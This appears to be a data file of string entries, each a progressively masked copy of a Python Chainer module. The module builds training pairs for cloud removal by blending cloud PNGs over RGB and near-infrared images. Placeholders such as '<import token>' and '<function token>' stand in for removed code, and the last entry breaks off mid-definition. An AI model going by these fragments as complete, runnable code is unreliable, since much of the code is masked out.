"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestRGB(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n <function token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n\n def __init__(self):\n super().__init__()\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n <function token>\n\n def transform(self, x, y):\n c, h, w = x.shape\n if self.augmentation:\n top = random.randint(0, h - self.size - 1)\n left = random.randint(0, w - self.size - 1)\n if random.randint(0, 1):\n x = x[:, :, ::-1]\n y = y[:, :, ::-1]\n else:\n top = (h - self.size) // 2\n left = (w - self.size) // 2\n bottom = top + self.size\n right = left + self.size\n x = x[:, top:bottom, left:right]\n y = y[:, top:bottom, left:right]\n return x, y\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass BaseTrain(chainer.dataset.DatasetMixin):\n <function token>\n <function token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n nirrgb = np.concatenate((nir[:, :, None], clouded_rgb), axis=2)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n nirrgb = nirrgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n nirrgb, rgbcloud = self.transform(nirrgb, rgbcloud)\n return nirrgb, rgbcloud\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, dir_cloud, imlist_nir, imlist_rgb,\n *args, **kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n <function token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass NIRRGB2RGBCLOUD(BaseTrain):\n <function token>\n <function token>\n <function token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n\n def __init__(self, dir_rgb, dir_cloud, imlist_rgb, *args, **kwargs):\n super().__init__()\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.cloud = list(glob.glob(os.path.join(dir_cloud, '*.png')))\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n <function token>\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n super().__init__()\n self.nir = read_imlist(dir_nir, imlist_nir)\n self.rgb = read_imlist(dir_rgb, imlist_rgb)\n self.size = kwargs.pop('size')\n self.augmentation = kwargs.pop('augmentation')\n\n def __len__(self):\n return len(self.rgb)\n\n def get_example(self, i):\n nir = cv2.imread(self.nir[i], 0).astype(np.float32)\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n nir = nir[None, :, :] / 127.5 - 1.0\n rgb = rgb.transpose(2, 0, 1) / 127.5 - 1.0\n nir, rgb = self.transform(nir, rgb)\n return nir, rgb\n",
"<import token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RGB2RGBCLOUD(BaseTrain):\n <function token>\n <function token>\n\n def get_example(self, i):\n rgb = cv2.imread(self.rgb[i], 1).astype(np.float32)\n cloud = cv2.imread(random.choice(self.cloud), -1).astype(np.float32)\n alpha = cloud[:, :, 3] / 255.0\n alpha = np.broadcast_to(alpha[:, :, None], alpha.shape + (3,))\n clouded_rgb = (1.0 - alpha) * rgb + alpha * cloud[:, :, :3]\n clouded_rgb = np.clip(clouded_rgb, 0.0, 255.0)\n cloud = cloud[:, :, 3]\n rgbcloud = np.concatenate((rgb, cloud[:, :, None]), axis=2)\n rgb = clouded_rgb.transpose(2, 0, 1) / 127.5 - 1.0\n rgbcloud = rgbcloud.transpose(2, 0, 1) / 127.5 - 1.0\n rgb, rgbcloud = self.transform(rgb, rgbcloud)\n return rgb, rgbcloud\n\n\nclass NIR2RGB(BaseTrain):\n\n def __init__(self, dir_nir, dir_rgb, imlist_nir, imlist_rgb, *args, **\n kwargs):\n 